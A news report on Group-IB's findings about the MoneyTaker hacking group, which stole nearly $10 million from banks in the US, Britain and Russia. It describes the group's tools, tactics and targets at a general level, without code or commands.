Report: Russian Hackers Target Banks in US, Britain, RussiaNearly $10 Million Stolen from 20 Institutions in Past 1½ Years
A group of Russian-speaking hackers over the past year-and-a-half has stolen nearly $10 million from banks mostly in the United States, Britain and Russia, the Moscow-based cybersecurity firm Group-IB reported Monday.
Group-IB labeled the group MoneyTaker after the malware used in attacks on at least 20 organizations, including 16 in the U.S. Most of the victims are small community banks, where hackers targeted card processing systems. Group-IB says the take from each successful attack averaged $500,000.
MoneyTaker uses legitimate penetration testing tools, including Metasploit and PowerShell Empire, as well as tools they developed, according to Group-IB. "When attacking, hackers act creatively and wisely: they use one-time infrastructure and carefully erase traces of their activity post-incident," the company said in a statement. Hackers use "'fileless' malware, which only exists in RAM and is removed on rebooting."
The analysis says hackers used SSL certificates that generated user names of well-known brands, such as Bank of America, Federal Reserve Bank, Microsoft and Yahoo. Servers employed to perform initial infections are one-time components that are changed immediately after each successful infection, Group-IB reports.
Hackers Change Course on the Fly
"Members of the group are skilled enough to promptly adjust the tools applied," the Group-IB report says. "In some cases, they made changes to the source code 'on the fly' during the attack."
Group-IB says the first attack attributed to MoneyTaker occurred in May 2016, when hackers pilfered money from a U.S. bank by gaining access to the First Data STAR card processing system. In September 2016, Group-IB says, it tracked several attacks on Russian banks by targeting the automated workstation client of the Russian Central Bank, a Russian interbank fund transfer system similar to SWIFT. In November 2016, Group-IB says attackers deployed new infrastructures to attack U.S. banks. The last activity using those infrastructures ended this past June, Group-IB says, but the company identified a hack on a Russian bank as late as November.
The cybercriminals also stole documentation for OceanSystems' FedLink card processing system, which is used by 200 banks in Latin America and the U.S. "We believe that banks operating on this infrastructure are at risk of being amongst the next targets of MoneyTaker group," Group-IB warns.